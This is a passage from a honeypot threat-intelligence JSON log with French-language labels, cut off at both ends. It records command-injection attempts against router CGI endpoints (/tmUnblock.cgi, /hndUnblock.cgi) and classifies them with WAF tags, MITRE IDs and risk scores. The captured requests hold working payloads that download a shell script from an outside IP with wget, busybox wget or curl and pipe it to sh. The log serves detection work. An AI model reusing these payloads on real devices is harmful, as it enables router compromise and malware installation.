\u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022942dffe22b1e260cae4e970e1af13a8a\u0022, \u0022path_pattern_hash\u0022: \u002240d64e5af66418a51c5ae33f5e8eb67d\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 82}, \u0022payload_preview\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 242\\r\\nConne\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/tmUnblock.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 242\\r\\nConnection: close\\r\\n\\r\\nttcp_num=3\u0026ttcp_size=3\u0026ttcp_ip=-h+%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lunblkv%3B\u0022, \u0022payload_snippet\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 242\\r\\nConne\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/tmUnblock.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 242\\r\\nConnection: close\\r\\n\\r\\nttcp_num=3\u0026ttcp_size=3\u0026ttcp_ip=-h+%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lunblkv%3B\u0022, \u0022payload_snippet\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 242\\r\\nConne\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022c2c685cdea07bc08a0c101501865995aa12cc9d0\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/tmUnblock.cgi\u0022, \u0022request_line\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 242\\r\\nConne\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/tmUnblock.cgi\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 82\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 82, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Cmdi\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/tmUnblock.cgi\u0022, \u0022request_line\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/tmUnblock.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 242\\r\\nConne\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 6 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":386},{"id":11809656,"ip":"45.153.34.252","ts":"2026-07-14 02:29:21.000000","proto":"tcp","src_port":35854,"dst_port":8081,"service":"http","classification":"lfi_path_traversal","waf_score":48,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022]","http_method":"GET","http_target":"\/hndUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lhablk%60","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u0022875060f63f6f9b01b3fa72fee9673a1d2beb64f6\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 293, \u0022payload_entropy\u0022: 5.130705142337301, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 78.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 60, \u0022tag_count\u0022: 10, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u002286edc1121ce6e69577a4766b6494c1ef34c5a689\u0022, \u0022event_fingerprint\u0022: \u0022d53ed1432749f4f37be86079de583b16121fc868\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022confidence\u0022: 0.59, \u0022classification_confidence\u0022: 0.59, \u0022precision_score\u0022: 70, \u0022precision_signals\u0022: [\u0022CRS-930100-sub\u0022], \u0022kb_rule_ids\u0022: [\u0022CRS-930100-sub\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022path_traversal\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 59.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00224beb4156032c0cba1982095a899fe13b\u0022, \u0022path_pattern_hash\u0022: \u00227e7da887259ec686429949e3a182bb9c\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 60}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lhablk%60\u0022, \u0022query_string\u0022: \u0022ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lhablk%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/hndUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lhablk%60 HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/hndUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20h\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lhablk%60\u0022, \u0022query_string\u0022: \u0022ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lhablk%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/hndUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lhablk%60 HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/hndUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lhablk%60 HTTP\/1.1\\r\\nHost: 6\u0022, \u0022payload_snippet\u0022: \u0022GET \/hndUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20h\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre\u0022: \u0022TA0001\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022176aeb3d825b829d1757eecde496cf8a468d6cfc\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lhab\u2026\u0022, \u0022request_line\u0022: \u0022GET \/hndUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http:\/\/91.\u2026\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/hndUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20h\u0022, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20w\u2026\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 7 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 60\/100 (Moyen) \u2014 MITRE TA0001 \u2014 confiance 59 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 59, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 60, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022CRS-930100-sub\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022CRS-930100-sub\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0001\u0022, \u0022mitre_technique\u0022: \u0022TA0001\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lhab\u2026\u0022, \u0022request_line\u0022: \u0022GET \/hndUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http:\/\/91.\u2026\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20w\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/hndUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20h\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 7 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 59 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, 